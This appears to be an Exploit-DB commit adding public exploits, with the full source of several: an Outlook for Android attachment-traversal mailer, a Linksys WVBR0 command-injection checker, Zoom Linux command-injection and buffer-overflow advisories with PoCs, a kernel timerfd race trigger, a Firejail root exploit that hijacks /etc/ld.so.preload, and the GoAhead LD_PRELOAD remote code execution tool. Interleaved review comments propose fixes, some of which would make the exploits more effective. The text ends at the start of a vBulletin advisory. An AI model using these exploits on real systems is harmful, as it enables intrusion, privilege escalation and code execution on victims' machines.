DB: 2017-12-19

19 changes to exploits/shellcodes

CDex 1.96 - Buffer Overflow
Zoom Linux Client 2.0.106600.0904 - Command Injection
Zoom Linux Client 2.0.106600.0904 - Stack-Based Buffer Overflow

Firejail - Local Privilege Escalation

Firejail < 0.9.44.4 / < 0.9.38.8 LTS - Local Sandbox Escape

Linux kernel < 4.10.15 - Race Condition Privilege Escalation
Outlook for Android - Attachment Download Directory Traversal
Western Digital MyCloud - 'multi_uploadify' File Upload (Metasploit)
GoAhead httpd 2.5 < 3.6.5 - 'LD_PRELOAD' Remote Code Execution

Joomla! Component Guru Pro - SQL Injection
Joomla! Component Guru Pro - 'Itemid' SQL Injection
Joomla! Component User Bench 1.0 - 'userid' SQL Injection
Joomla! Component My Projects 2.0 - SQL Injection
vBulletin 5 - 'routestring' Unauthenticated Remote Code Execution
vBulletin 5 - 'cacheTemplates' Unauthenticated Remote Arbitrary File Deletion
Linksys WVBR0 - 'User-Agent' Remote Command Injection
Joomla! Component JB Visa 1.0 - 'visatype' SQL Injection
Joomla! Component Guru Pro - 'promocode' SQL Injection

Monstra CMS 3.0.4 - Arbitrary File Upload / Remote Code Execution
Offensive Security 2017-12-19 05:02:17 +00:00
parent 729a1a8bbf
commit f76fbb1072
18 changed files with 1586 additions and 2 deletions

exploits/android/remote/43353.py Executable file

@ -0,0 +1,122 @@
'''
There is a directory traversal issue in attachment downloads in Outlook for Android. There is no path sanitization on the attachment filename in the app. If the email account is a Hotmail account, this will be sanitized by the server, but for other accounts it will not be. This allows a file to be written anywhere on the filesystem that the Outlook app can access when an attached image is viewed in the Outlook app.
This bug has the following limitations:
1) the email address has to be a non-Hotmail address
2) the file can not overwrite an existing file (append happens in this case), it has to be a file that doesn't already exist.
3) the user has to click the image and view it, it is not sufficient just to view the thumbnail in the message.
It is possible to modify a database using this bug by placing a journal file in the databases directory.
Below is a PoC of an email that causes this issue. Attached is a python script that will send an email that causes this issue (don't forget to add in the to and from addresses, and your email credentials). WARNING: this PoC will cause Outlook to crash repeatedly, and you will need to re-install it to get it to work again
Content-Type: Content-Type: multipart/mixed; boundary="----714A286D976BF3E58D9D671E37CBCF7C"
MIME-Version: 1.0
Subject: hello image2adfdfs1
To: EMAIL
From: natashenka@google.com
You will not see this in a MIME-aware mail reader.
------714A286D976BF3E58D9D671E37CBCF7C
Content-Type: text/html
<html>
<body>
test
</body>
</html>
------714A286D976BF3E58D9D671E37CBCF7C
Content-Type: image/png; name="t124"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="../databases/acompli.db-journal"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=
------714A286D976BF3E58D9D671E37CBCF7C
'''
import os
import sys
import smtplib
import mimetypes
from optparse import OptionParser
from email import encoders
from email.message import Message
from email.mime.audio import MIMEAudio
from email.mime.base import MIMEBase
from email.mime.image import MIMEImage
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import subprocess
import random
def main():
FROM_ADDRESS = "YOUR FROM ADDRESS HERE"
YOUR_CREDENTIAL = "GET A GOOGLE ACCOUNT TEMPORARY PASSWORD AND PUT IT HERE"
TO_ADDRESS = "ACCOUNT TO ATTACK HERE"
composed = """Content-Type: multipart/signed; protocol="application/x-pkcs7-signature"; micalg=sha1; boundary="----714A286D976BF3E58D9D671E37CBCF7C"
MIME-Version: 1.0
Subject: hello image2adfdfs1
To: """+ TO_ADDRESS +"""
From: """ + FROM_ADDRESS + """
You will not see this in a MIME-aware mail reader.
------714A286D976BF3E58D9D671E37CBCF7C
Content-Type: text/html
<html>
<body>
test
</body>
</html>
------714A286D976BF3E58D9D671E37CBCF7C
Content-Type: image/png; name="t124"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="../databases/acompli.db-journal"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=
------714A286D976BF3E58D9D671E37CBCF7C"""
s = smtplib.SMTP_SSL("smtp.gmail.com")
s.login(FROM_ADDRESS, YOUR_CREDENTIAL)
you = TO_ADDRESS
s.sendmail(FROM_ADDRESS, you, composed)
s.quit()
if __name__ == '__main__':
main()
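Review bot: the `composed` message in `main()` does not match the sample message in the docstring: the docstring's outer header reads `Content-Type: Content-Type: multipart/mixed; ...` (header name doubled) while the script sends `Content-Type: multipart/signed; protocol="application/x-pkcs7-signature"; micalg=sha1; ...`, so a reader cannot tell which variant was actually verified against the app. Since the docstring identifies the trigger as the unsanitized `Content-Disposition: attachment; filename="../databases/acompli.db-journal"` header, the two messages should be made identical and the doubled header name dropped. The `os`, `mimetypes`, `OptionParser`, `encoders`, `Message`, `MIMEAudio`, `MIMEBase`, `MIMEImage`, `MIMEMultipart`, `MIMEText`, `subprocess` and `random` imports are unused and can be removed.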


@ -0,0 +1,70 @@
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Author: Nixawk
# CVE-2017-17411
# Linksys WVBR0 25 Command Injection
"""
$ python2.7 exploit-CVE-2017-17411.py
[*] Usage: python exploit-CVE-2017-17411.py <URL>
$ python2.7 exploit-CVE-2017-17411.py http://example.com/
[+] Target is exploitable by CVE-2017-17411
"""
import requests
def check(url):
payload = '"; echo "admin'
md5hash = "456b7016a916a4b178dd72b947c152b7" # echo "admin" | md5sum
resp = send_http_request(url, payload)
if not resp:
return False
lines = resp.text.splitlines()
sys_cmds = filter(lambda x: "config.webui sys_cmd" in x, lines)
if not any([payload in sys_cmd for sys_cmd in sys_cmds]):
return False
if not any([md5hash in sys_cmd for sys_cmd in sys_cmds]):
return False
print("[+] Target is exploitable by CVE-2017-17411 ")
return True
def send_http_request(url, payload):
headers = {
'User-Agent': payload
}
response = None
try:
response = requests.get(url, headers=headers)
except Exception as err:
log.exception(err)
return response
if __name__ == '__main__':
import sys
if len(sys.argv) != 2:
print("[*] Usage: python %s <URL>" % sys.argv[0])
sys.exit(0)
check(sys.argv[1])
# google dork: "Vendor:LINKSYS ModelName:WVBR0-25-US"
## References
# https://www.thezdi.com/blog/2017/12/13/remote-root-in-directvs-wireless-video-bridge-a-tale-of-rage-and-despair
# https://thehackernews.com/2017/12/directv-wvb-hack.html
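Review bot: the `except` branch in `send_http_request()` calls `log.exception(err)`, but no `log` object is defined or imported anywhere in the file, so a connection failure raises `NameError` instead of returning `None` as `check()` expects; add `import logging` and `log = logging.getLogger(__name__)` at the top. The script is Python 2 only (the docstring invokes `python2.7`, and `filter()` returning a list is what makes the two successive `any()` calls over `sys_cmds` work; under Python 3 `filter()` is a one-shot iterator and the second `any()` would always see an empty sequence), so either change the shebang to `python2` or wrap the filter in `list()`. The `# google dork:` and `## References` comments after the `__main__` block would be easier to find in the header docstring.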


@ -0,0 +1,111 @@
[CONVISO-17-003] - Zoom Linux Client Command Injection Vulnerability (RCE)
1. Advisory Information
Conviso Advisory ID: CONVISO-17-003
CVE ID: CVE-2017-15049
CVSS v2: 10, (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Date: 2017-10-01
2. Affected Components
Zoom client for Linux, version 2.0.106600.0904 (zoom_amd64.deb). Other versions may be
vulnerable.
3. Description
The binary /opt/zoom/ZoomLauncher is vulnerable to command injection because it uses user input
to construct a shell command without proper sanitization.
The client registers a scheme handler (zoommtg://) and this makes possible to trigger the
vulnerability remotely.
4. Details
gef> r '$(uname)'
Starting program: /opt/zoom/ZoomLauncher '$(uname)'
ZoomLauncher started.
cmd line: $(uname)
$HOME = /home/user
Breakpoint 5, 0x0000000000401e1f in startZoom(char*, char*) ()
gef> x/3i $pc
=> 0x401e1f <_Z9startZoomPcS_+744>: call 0x4010f0 <strcat@plt>
0x401e24 <_Z9startZoomPcS_+749>: lea rax,[rbp-0x1420]
0x401e2b <_Z9startZoomPcS_+756>: mov rcx,0xffffffffffffffff
gef> x/s $rdi
0x7fffffffbf10: "export SSB_HOME=/home/user/.zoom; export QSG_INFO=1; export
LD_LIBRARY_PATH=/opt/zoom;/opt/zoom/zoom \""
gef> x/s $rsi
0x7fffffffd750: "$(uname) "
gef> c
Continuing.
export SSB_HOME=/home/user/.zoom; export QSG_INFO=1; export
LD_LIBRARY_PATH=/opt/zoom;/opt/zoom/zoom "$(uname) "
Breakpoint 6, 0x0000000000401e82 in startZoom(char*, char*) ()
gef> x/3i $pc
=> 0x401e82 <_Z9startZoomPcS_+843>: call 0x401040 <system@plt>
0x401e87 <_Z9startZoomPcS_+848>: mov DWORD PTR [rbp-0x18],eax
0x401e8a <_Z9startZoomPcS_+851>: mov eax,DWORD PTR [rbp-0x18]
gef> x/s $rdi
0x7fffffffbf10: "export SSB_HOME=/home/user/.zoom; export QSG_INFO=1; export
LD_LIBRARY_PATH=/opt/zoom;/opt/zoom/zoom \"$(uname) \""
--- RCE POC ---
<html>
<head>
</head>
<body>
<h1>Zoom POC RCE</h1>
<script>
window.location = 'zoommtg://$(gnome-calculator${IFS}-e${IFS}1337)'
</script>
<body>
</html>
5. Solution
Upgrade to latest version.
6. Credits
Ricardo Silva <rsilva@conviso.com.br>
Gabriel Quadros <gquadros@conviso.com.br>
7. Report Timeline
Set 28, 2017 - Conviso sent first email asking for a channel to discuss the vulnerability.
Set 28, 2017 - Vendor asked the report in the current channel.
Set 28, 2017 - Conviso sent informations to reproduce the vulnerability.
Set 28, 2017 - Conviso asked if they could reproduce it.
Set 28, 2017 - Vendor replied saying that the informations were forwarded to engineering team.
Oct 5, 2017 - Vendor provided a patch candidate for testing.
Oct 5, 2017 - Conviso pointed problems in the patch.
Oct 11, 2017 - Vendor provided a patch candidate for testing.
Oct 12, 2017 - Conviso pointed problems in the patch.
Oct 23, 2017 - Conviso asked for status.
Oct 27, 2017 - Conviso asked for status.
Nov 1, 2017 - Conviso asked for status.
Nov 3, 2017 - Vendor replied.
Nov 6, 2017 - Conviso asked for status.
Nov 6, 2017 - Vendor replied.
Nov 9, 2017 - Conviso asked for status.
Nov 13, 2017 - Conviso asked for status.
Nov 15, 2017 - Conviso asked for status.
Nov 16, 2017 - Vendor provided a patch candidate for testing.
Nov 16, 2017 - The patch seems to fix the attack vector, although no further research was done.
Nov 20, 2017 - Vendor thanked and marked the issue as solved, considering the patch as a
sastifactory fix.
Nov 30, 2017 - Vendor released the version 2.0.115900.1201
8. References
https://zoom.us/download
https://support.zoom.us/hc/en-us/articles/205759689-New-Updates-for-Linux
9. About Conviso
Conviso is a consulting company specialized on application security. Our values are based on the
allocation of the adequate competencies on the field, a clear and direct speech with the market,
collaboration and partnership with our customers and business partners and constant investments
on methodology and research improvement. For more information about our company and services
provided, please check our website at www.conviso.com.br.
10. Copyright and Disclaimer
The information in this advisory is Copyright 2017 Conviso Application Security S/A and provided
so that the society can understand the risk they may be facing by running affected software,
hardware or other components used on their systems. In case you wish to copy information from
this advisory, you must either copy all of it or refer to this document (including our URL). No
guarantee is provided for the accuracy of this information, or damage you may cause your systems
in testing.
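Review bot: section 5 ("Upgrade to latest version") should name the fixed release, which the timeline itself gives as 2.0.115900.1201 (Nov 30, 2017), so readers can check an installed client against it. The section 4 trace already shows the root cause: `startZoom()` builds `export ...; /opt/zoom/zoom "<url>"` with `strcat` and hands it to `system()`, and because the URL sits inside double quotes, `$(...)` is still expanded by the shell, so quoting alone cannot fix this; passing the URL as an `execve()` argument instead of through a shell is the recommendation worth stating next to the upgrade. Minor: the HTML PoC ends with a second `<body>` where `</body>` is meant, and in the timeline `Set` should read `Sep`, `informations` should be `information`, and `sastifactory` should be `satisfactory`.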


@ -0,0 +1,113 @@
[CONVISO-17-002] - Zoom Linux Client Stack-based Buffer Overflow Vulnerability
1. Advisory Information
Conviso Advisory ID: CONVISO-17-002
CVE ID: CVE-2017-15048
CVSS v2: 6.8, (AV:N/AC:M/Au:N/C:P/I:P/A:P)
Date: 2017-10-01
2. Affected Components
Zoom client for Linux, version 2.0.106600.0904 (zoom_amd64.deb). Other versions may be
vulnerable.
3. Description
The binary /opt/zoom/ZoomLauncher is vulnerable to a buffer overflow because it concatenates a
overly long user input to a stack variable without checking if the destination buffer is long
enough to hold the data.
The binary also has important security features like canary turned off.
The client registers a scheme handler (zoommtg://) and this makes possible to trigger the
vulnerability remotely.
4. Details
gef> checksec
[+] checksec for '/opt/zoom/ZoomLauncher'
Canary : No
NX : Yes
PIE : No
Fortify : No
RelRO : Partial
gef>
gef> r $(python -c 'print "A"*1048 + "BBBBBBBB"')
Starting program: /opt/zoom/ZoomLauncher $(python -c 'print "A"*1048 + "BBBBBBBB"')
ZoomLauncher started.
Breakpoint 4, 0x00000000004025a6 in main ()
gef> x/5i $pc
=> 0x4025a6 <main+367>: call 0x4010f0 <strcat@plt>
0x4025ab <main+372>: lea rax,[rbp-0x410]
0x4025b2 <main+379>: mov rcx,0xffffffffffffffff
0x4025b9 <main+386>: mov rdx,rax
0x4025bc <main+389>: mov eax,0x0
gef> x/s $rdi
0x7fffffffd330: ""
gef> x/s $rsi
0x7fffffffdc35: 'A' <repeats 1048 times>, "BBBBBBBB"
gef> i f
Stack level 0, frame at 0x7fffffffd750:
rip = 0x4025a6 in main; saved rip = 0x7ffff7216f45
Arglist at 0x7fffffffd740, args:
Locals at 0x7fffffffd740, Previous frame's sp is 0x7fffffffd750
Saved registers:
rbp at 0x7fffffffd740, rip at 0x7fffffffd748
gef> ni
0x00000000004025ab in main ()
gef> i f
Stack level 0, frame at 0x7fffffffd750:
rip = 0x4025ab in main; saved rip = 0x4242424242424242
Arglist at 0x7fffffffd740, args:
Locals at 0x7fffffffd740, Previous frame's sp is 0x7fffffffd750
Saved registers:
rbp at 0x7fffffffd740, rip at 0x7fffffffd748
gef>
5. Solution
Upgrade to latest version.
6. Credits
Ricardo Silva <rsilva@conviso.com.br>
Gabriel Quadros <gquadros@conviso.com.br>
7. Report Timeline
Set 28, 2017 - Conviso sent first email asking for a channel to discuss the vulnerability.
Set 28, 2017 - Vendor asked the report in the current channel.
Set 28, 2017 - Conviso sent informations to reproduce the vulnerability.
Set 28, 2017 - Conviso asked if they could reproduce it.
Set 28, 2017 - Vendor replied saying that the informations were forwarded to engineering team.
Oct 5, 2017 - Vendor provided a patch candidate for testing.
Oct 5, 2017 - Conviso pointed problems in the patch.
Oct 11, 2017 - Vendor provided a patch candidate for testing.
Oct 12, 2017 - Conviso pointed problems in the patch.
Oct 23, 2017 - Conviso asked for status.
Oct 27, 2017 - Conviso asked for status.
Nov 1, 2017 - Conviso asked for status.
Nov 3, 2017 - Vendor replied.
Nov 6, 2017 - Conviso asked for status.
Nov 6, 2017 - Vendor replied.
Nov 9, 2017 - Conviso asked for status.
Nov 13, 2017 - Conviso asked for status.
Nov 15, 2017 - Conviso asked for status.
Nov 16, 2017 - Vendor provided a patch candidate for testing.
Nov 16, 2017 - The patch seems to fix the attack vector, although no further research was done.
Nov 20, 2017 - Vendor thanked and marked the issue as solved, considering the patch as a
sastifactory fix.
Nov 30, 2017 - Vendor released the version 2.0.115900.1201
8. References
https://zoom.us/download
https://support.zoom.us/hc/en-us/articles/205759689-New-Updates-for-Linux
9. About Conviso
Conviso is a consulting company specialized on application security. Our values are based on the
allocation of the adequate competencies on the field, a clear and direct speech with the market,
collaboration and partnership with our customers and business partners and constant investments
on methodology and research improvement. For more information about our company and services
provided, please check our website at www.conviso.com.br.
10. Copyright and Disclaimer
The information in this advisory is Copyright 2017 Conviso Application Security S/A and provided
so that the society can understand the risk they may be facing by running affected software,
hardware or other components used on their systems. In case you wish to copy information from
this advisory, you must either copy all of it or refer to this document (including our URL). No
guarantee is provided for the accuracy of this information, or damage you may cause your systems
in testing.
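Review bot: the numbers in the section 4 trace are internally consistent and worth spelling out for readers: `$rdi` is `0x7fffffffd330`, which is exactly `rbp-0x410` with `rbp at 0x7fffffffd740`, so 1040 bytes of `A` fill the buffer, the next 8 overwrite the saved rbp, and the 8 `B`s land on the saved rip at `0x7fffffffd748`, which is what the second `i f` shows (`saved rip = 0x4242424242424242`). As in CONVISO-17-003, section 5 should cite 2.0.115900.1201 from the timeline rather than "latest version". The `checksec` output (no canary, no PIE, partial RELRO) is part of the finding, and section 5 would be stronger if it also recommended building ZoomLauncher with `-fstack-protector-strong`, `-fPIE -pie` and full RELRO in addition to replacing the unbounded `strcat` with a length-checked copy. Same timeline typos as in the sibling advisory (`Set`, `informations`, `sastifactory`).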


@ -0,0 +1,180 @@
/*
* PoC for CVE-2017-10661, triggers UAF with KASan enabled in kernel 4.10
*/
#include <string.h>
#include <sys/timerfd.h>
#include <sys/time.h>
#include <sys/msg.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/mman.h>
#include <errno.h>
#include <time.h>
#include <netinet/ip.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <stdint.h>
#include <pthread.h>
#define RACE_TIME 1000000
int fd;
int fd_dumb;
int count=0;
void* list_add_thread(void* arg){
int ret;
struct itimerspec new ={
.it_interval={
.tv_sec=100,
.tv_nsec=100
},
.it_value={
.tv_sec=100,
.tv_nsec=100
}
};
int i=0;
while(i<1){
ret=timerfd_settime(fd,3,&new,NULL);
if(ret<0){
perror("timerfd settime failed !");
}
i++;
}
return NULL;
}
void* list_del_thread(void* arg){
int ret;
struct itimerspec new ={
.it_interval={
.tv_sec=100,
.tv_nsec=100
},
.it_value={
.tv_sec=100,
.tv_nsec=100
}
};
int i=0;
while(i<1){
ret=timerfd_settime(fd,1,&new,NULL);
if(ret<0){
perror("timerfd settime failed !");
}
i++;
}
return NULL;
}
int post_race()
{
int ret;
struct itimerspec new ={
.it_interval={
.tv_sec=100,
.tv_nsec=100
},
.it_value={
.tv_sec=100,
.tv_nsec=100
}
};
int i=0;
struct timeval tv={
.tv_sec = 120+count*2,
.tv_usec = 100
};
ret=settimeofday(&tv,NULL);
if(ret<0){
perror("settimeofday");
}
return 0;
}
int do_race(){
int ret_add[2];
int i;
int j;
pthread_t th[2]={0};
i=0;
while(i<RACE_TIME){
if(i%128)
printf("%d\n",i);
fd=timerfd_create(CLOCK_REALTIME,0); // create the victim ctx
if(fd<0){
perror("timerfd craete failed!");
return -1;
}
ret_add[0] = pthread_create(&th[0],NULL,list_add_thread,(void*)1);
ret_add[1] = pthread_create(&th[1],NULL,list_add_thread,(void*)2);
for( j=0;j<2;j++){
pthread_join(th[j],NULL);
}
close(fd);
usleep(150000);
i++;
count++;
}
return 0;
}
int main(int argc, char const *argv[])
{
int ret;
// add dumb ctx
void* area;
void* base;
struct itimerspec new ={
.it_interval={
.tv_sec=100,
.tv_nsec=100
},
.it_value={
.tv_sec=100,
.tv_nsec=100
}
};
fd_dumb = timerfd_create(CLOCK_REALTIME,0);
ret=timerfd_settime(fd_dumb,3,&new,NULL);
if(ret<0){
perror("timerfd settime failed !");
}
ret=do_race();
if(ret <0){
puts("race failed!");
goto error_end;
}
sleep(5);
error_end:
close(fd);
exit(1);
}
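Review bot: `do_race()` starts both threads on `list_add_thread()` (flags 3, i.e. `TFD_TIMER_ABSTIME|TFD_TIMER_CANCEL_ON_SET`), while `list_del_thread()` (flags 1, `TFD_TIMER_ABSTIME` only) and `post_race()` are defined but never called; if the race needs one thread arming with cancel-on-set and the other re-arming without it, as the function names suggest, the second `pthread_create` should pass `list_del_thread`, otherwise the dead code should be removed so the PoC documents what it actually does. `if(i%128) printf("%d\n",i);` prints on every iteration except multiples of 128, so the condition is inverted (`i % 128 == 0`). `area`, `base` and `ret_add[]` are unused, the `while(i<1)` loops in both thread functions run their body exactly once, and `main()` always returns through `exit(1)`, so a caller cannot tell a completed run from the `race failed!` path; the comment at the top should also say what the expected KASan report looks like so a reader knows when the trigger succeeded.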


@ -0,0 +1,101 @@
/* firejail local root exploit (host to host)
*
* (C) 2017 Sebastian Krahmer under the GPL.
*
* WARNING: This exploit uses ld.so.preload technique.
* If you are in bad luck, you may end up with an unusable system.
* SO BE WARNED. ONLY TEST IT IN YOUR SAFE VM's.
*
* Get the beauty that this is a shared lib and a running
* executable at the same time, as we tamper with /etc/ld.so.preload
*
* Therefore you have to compile it like this:
*
* $ cc -fPIC -fpic -std=c11 -Wall -pedantic -c firenail.c
* $ gcc -shared -pie firenail.o -o firenail
* $ ./firenail
*
* DO NOT TELL ME THAT SELINUX WOULD HAVE PREVENTED THIS EXPLOIT.
* IF I WAS ABOUT TO BYPASS SELINUX ALONG, I WOULD HAVE DONE THE
* EXPLOIT DIFFERENTLY.
*
* Analysis: Sandboxing is cool, but it has to be done right.
* Firejail has too broad attack surface that allows users
* to specify a lot of options, where one of them eventually
* broke by accessing user-files while running with euid 0.
* There are some other similar races. Turns out that it can be
* _very difficult_ to create a generic sandbox suid wrapper thats
* secure but still flexible enough to sandbox arbitrary binaries.
*
* Tested with latest commit 699ab75654ad5ab7b48b067a2679c544cc8725f6.
*/
#define _POSIX_C_SOURCE 200212
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/stat.h>
#include <sys/types.h>
const char *const ldso = "/etc/ld.so.preload";
int main();
__attribute__((constructor)) void init(void)
{
if (geteuid())
return;
unlink(ldso);
char *sh[] = {"/bin/sh", "--noprofile", "--norc", NULL};
setuid(0);
setgid(0);
execve(*sh, sh, NULL);
exit(1);
}
void die(const char *s)
{
perror(s);
exit(errno);
}
int main()
{
printf("[*] fire(j|n)ail local root exploit 2017\n\n");
char me[4096] = {0}, *home = getenv("HOME");
if (!home)
die("[-] no $HOME");
if (readlink("/proc/self/exe", me, sizeof(me) - 1) < 0)
die("[-] Unable to find myself");
char path[256] = {0};
snprintf(path, sizeof(path) - 1, "%s/.firenail", home);
if (mkdir(path, 0700) < 0 && errno != EEXIST)
die("[-] mkdir");
snprintf(path, sizeof(path) - 1, "%s/.firenail/.Xauthority", home);
if (symlink(ldso, path) < 0 && errno != EEXIST)
die("[-] symlink");
system("firejail --private=.firenail /usr/bin/id");
int fd = open(ldso, O_RDWR|O_TRUNC);
if (fd < 0)
die("[-] open");
write(fd, me, strlen(me));
write(fd, "\n", 1);
close(fd);
char *su[] = {"/bin/su", NULL};
execve(*su, su, NULL);
die("[-] execve su");
return -1;
}
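Review bot: the two `write()` calls in `main()` that populate `/etc/ld.so.preload` ignore their return values; given the header's own warning that a bad preload file can leave the system unusable, a short write should be detected (check the returned count, or use `dprintf(fd, "%s\n", me)` for a single write). `setuid(0)` and `setgid(0)` in `init()` are likewise unchecked. For readers on the defensive side the header's analysis is the useful part, and the code makes it concrete: `firejail --private=.firenail` accesses `.Xauthority` inside a user-supplied directory while still running with euid 0 and follows the user's symlink to `/etc/ld.so.preload`, which is the "accessing user-files while running with euid 0" the header describes; any fix has to stop following user-controlled paths as root (drop privileges first, or open with `O_NOFOLLOW` relative to a verified directory), and the header's tested commit `699ab75654ad5ab7b48b067a2679c544cc8725f6` is the reference point for checking whether a given build predates the fix.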

exploits/linux/remote/43360.py Executable file

@ -0,0 +1,191 @@
#!/usr/bin/python
# GoAhead httpd/2.5 to 3.6.5 LD_PRELOAD remote code execution exploit
# EDB Note: Payloads ~ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43360.zip
# EDB Note: Source ~ https://www.elttam.com.au/blog/goahead/
# EDB Note: Source ~ https://github.com/elttam/advisories/blob/c778394dfe454083ebdfb52f660fd3414ee8adb8/CVE-2017-17562/
#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
#+++++++++++++++++++++++++++++++++++:--/++++++++++++++++++++++++++++++++++++
#+++++++++++++++++++++++++++++++/:-......-:/++++++++++++++++++++++++++++++++
#++++++++++++++++++++++/////::-..............-:://///+++++++++++++++++++++++
#++++++++++++++++++++++..............-:..............+++++++++++++++++++++++
#++++++++++++++++++++++..........-://+++/:-..........+++++++++++++++++++++++
#++++++++++++++++++++++......://++++++++++++//::.....+++++++++++++++++++++++
#++++++++++++++++++++++......++++++++++++++++++/.....+++++++++++++++++++++++
#++++++++++++++++++++++......:/+++++++++++++++/-.....+++++++++++++++++++++++
#++++++++++++++++++++++.........--::////:::--........+++++++++++++++++++++++
#++++++++++++++++++++++-...........................:/+++++++++++++++++++++++
#++++++++++++++++++++++:.....-................--:/++++++++++++++++++++++++++
#+++++++++++++++++++++++-....-+///::::::::///+++++++++++++++++++++++++++++++
#+++++++++++++++++++++++/.....-/++++++++++++++++/::+++++++++++++++++++++++++
#++++++++++++++++++++++++/-.....-/++++++++/:--...-/+++++++++++++++++++++++++
#++++++++++++++++++++++++++:.......:/++/:.......:+++++++++++++++++++++++++++
#+++++++++++++++++++++++++++/-................-/++++++++++++++++++++++++++++
#+++++++++++++++++++++++++++++/:-..........-:/++++++++++++++++++++++++++++++
#++++++++++++++++++++++++++++++++/:--..--:/+++++++++++++++++++++++++++++++++
#++++++++++++++++++++++++++++++++++++++++++++++++(c) 2017 elttam Pty Ltd.+++
# ~/goahead_exploit>>> ./makemyday.py -h
# usage: makemyday.py [-h] [--server SERVER] [--port PORT] [--maxconn {1-256}]
# [--verbose]
# {fingerprint,stage,exploit,findcgi} ...
#
# GoAhead httpd remote LD_PRELOAD exploit.
#
# positional arguments:
# {fingerprint,stage,exploit,findcgi}
# fingerprint fingerprint if GoAhead server uses CGI
# stage send a staging payload and wait indefinitely
# exploit run exploit
# findcgi brute force cgi script names
#
# optional arguments:
# -h, --help show this help message and exit
# --server SERVER target ip or hostname, default is localhost
# --port PORT target port, default is 80
# --maxconn {1-256} max concurrent requests, default is 1
# --verbose, -v increase verbosity level
#
# See https://www.elttam.com.au for more information.
# >>>./makemyday.py --server 192.168.1.24 --port 80 exploit --payload ./payloads/X86_64-hw.so
# exploit works!
import argparse
import httplib
import sys
import threading
from string import Template
class GoAheadExploit(object):
'''GoAheadExploit'''
qid = None
payload = None
exploited = False
def __init__(self):
'''Configure arguments and run the exploit'''
parser = argparse.ArgumentParser(
description="GoAhead httpd remote LD_PRELOAD exploit.",
epilog="See https://www.elttam.com.au for more information."
)
parser.add_argument('--server', default="localhost",
help='target ip or hostname, default is localhost')
parser.add_argument('--port', type=int, default=80,
help='target port, defaults is 80')
parser.add_argument('--maxconn', type=int, default=1, choices=xrange(1, 256),
metavar="{1-256}", help='max concurrent requests, default is 1')
parser.add_argument('--verbose', '-v', default=0, action='count',
help='increase verbosity level')
common_options = argparse.ArgumentParser(add_help=False)
common_options.add_argument('--cginame', default="cgitest",
help='target cgi script')
common_options.add_argument('--payload', nargs='?',
type=argparse.FileType('r'), default=sys.stdin,
help='shared object file to execute (defaults to stdin)')
cmd_subparsers = parser.add_subparsers(dest="action")
cmd_subparsers.add_parser(
'fingerprint', help='fingerprint if GoAhead server uses CGI')
cmd_subparsers.add_parser('stage', parents=[common_options],
help='send a staging payload and wait indefinitely')
cmd_subparsers.add_parser('exploit', parents=[common_options],
help='run exploit')
findcgi = cmd_subparsers.add_parser(
'findcgi', help='brute force cgi script names')
findcgi.add_argument('--wordlist', nargs='?',
type=argparse.FileType('r'), default=sys.stdin,
help='list of cgi filenames to brute force (defaults to stdin)')
# parse command line and call into action
self.args = parser.parse_args()
getattr(self, self.args.action)()
def fingerprint(self):
'''fingerprint'''
conn = httplib.HTTPConnection(self.args.server, self.args.port)
conn.connect()
conn.request(
"GET", "/cgi-bin/c8fed00eb2e87f1cee8e90ebbe870c190ac3848c")
if conn.getresponse().read().find("CGI process file does not exist") != -1:
print "CGI scripting is enabled"
else:
print "CGI scripting is disabled"
conn.close()
def findcgi(self):
'''findcgi'''
for cginame in self.args.wordlist.readlines():
cginame = cginame[:-1]
conn = httplib.HTTPConnection(self.args.server, self.args.port)
conn.connect()
conn.request("GET", "/cgi-bin/" + cginame)
resp = conn.getresponse()
if resp.status == 200:
print "/cgi-bin/" + cginame + " exists."
conn.close()
def stage(self):
'''stage'''
payload = self.args.payload.read()
headers = {"Host": self.args.server,
"User-Agent": "curl/7.51.0",
"Accept": "*/*",
"Content-Length": str(len(payload) + 1)}
conn = httplib.HTTPConnection(self.args.server, self.args.port)
conn.connect()
conn.request("POST", "/cgi-bin/" + self.args.cginame, payload, headers)
try:
conn.getresponse()
except httplib.BadStatusLine:
pass
conn.close()
def exploit(self):
'''exploit'''
for _ in range(0, self.args.maxconn):
tid = threading.Thread(self.do_exploit(verify,))
tid.start()
def do_exploit(self, verify_callback):
'''do_exploit'''
if not self.payload:
self.payload = self.args.payload.read()
contentlen = len(self.payload)
headers = {"Host": self.args.server,
"User-Agent": "curl/7.51.0",
"Accept": "*/*",
"Content-Length": str(contentlen)}
exploit_string = Template("/cgi-bin/${cginame}?LD_PRELOAD="
"/proc/self/fd/0").substitute({
"cginame": self.args.cginame
})
while not self.exploited:
conn = httplib.HTTPConnection(self.args.server, self.args.port, timeout=10)
conn.connect()
conn.request("POST", exploit_string, self.payload, headers)
try:
if verify_callback(conn.getresponse()):
self.exploited = True
print "exploit works!"
except httplib.BadStatusLine:
pass
conn.close()
# put your payload callback/verification code here
def verify(res):
'''validation callback'''
if res.getheader("hello"):
return True
return False
if __name__ == '__main__':
GoAheadExploit()
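Review bot: `exploit()` never runs anything on a thread: `threading.Thread(self.do_exploit(verify,))` calls `do_exploit(verify)` synchronously in the main thread (the trailing comma is inside the call parentheses, not a tuple) and passes its `None` return value as `Thread`'s `group` argument, so `--maxconn` has no effect and the loop only advances after the first `do_exploit` has already looped to success; it should read `threading.Thread(target=self.do_exploit, args=(verify,))`, with the threads joined afterwards. `choices=xrange(1, 256)` rejects 256 although the metavar advertises `{1-256}`; use `xrange(1, 257)`. `verify` is referenced inside the class but defined at module level after it, which only works because the name is resolved at call time; moving it above the class or making it a static method would make that explicit. The script is Python 2 only (`httplib`, `xrange`, `print` statements), so the shebang should say `python2`, and the `--port` help text has "defaults is".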


@ -0,0 +1,264 @@
# SSD Advisory vBulletin routestring Unauthenticated Remote Code Execution
Source: https://blogs.securiteam.com/index.php/archives/3569
## Vulnerability Summary
The following advisory describes a unauthenticated file inclusion vulnerability that leads to remote code execution found in vBulletin version 5.
